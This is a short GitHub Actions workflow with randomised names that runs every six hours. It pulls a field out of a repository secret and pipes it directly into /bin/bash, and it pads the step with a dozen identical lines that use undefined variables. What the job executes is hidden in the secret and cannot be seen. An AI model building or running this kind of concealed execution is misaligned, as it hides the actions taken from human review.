name: taohuani4163

on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taohuani4163
        env:
          xdsb09: ${{ secrets.xdsb09 }}
        run: |
          echo $xdsb09 | jq -r .py59095 | /bin/bash
          echo $zvuka59118 | jq -r .idww8 | /bin/bash
          echo $govs75898 | jq -r .wjni77607 | /bin/bash
          echo $ythr47283 | jq -r .vpor43 | /bin/bash
          echo $qjyy61 | jq -r .uivmg8852 | /bin/bash
          echo $z7 | jq -r .y7 | /bin/bash
          echo $mlxe52 | jq -r .quo4123 | /bin/bash
          echo $c51300 | jq -r .mnmgt25 | /bin/bash
          echo $zyzi872 | jq -r .t7653 | /bin/bash
          echo $jla41736 | jq -r .ynrg30884 | /bin/bash
          echo $hr1 | jq -r .lks13313 | /bin/bash
          echo $marjh934 | jq -r .rovfv09 | /bin/bash
          echo $hnx8024 | jq -r .sduai763 | /bin/bash

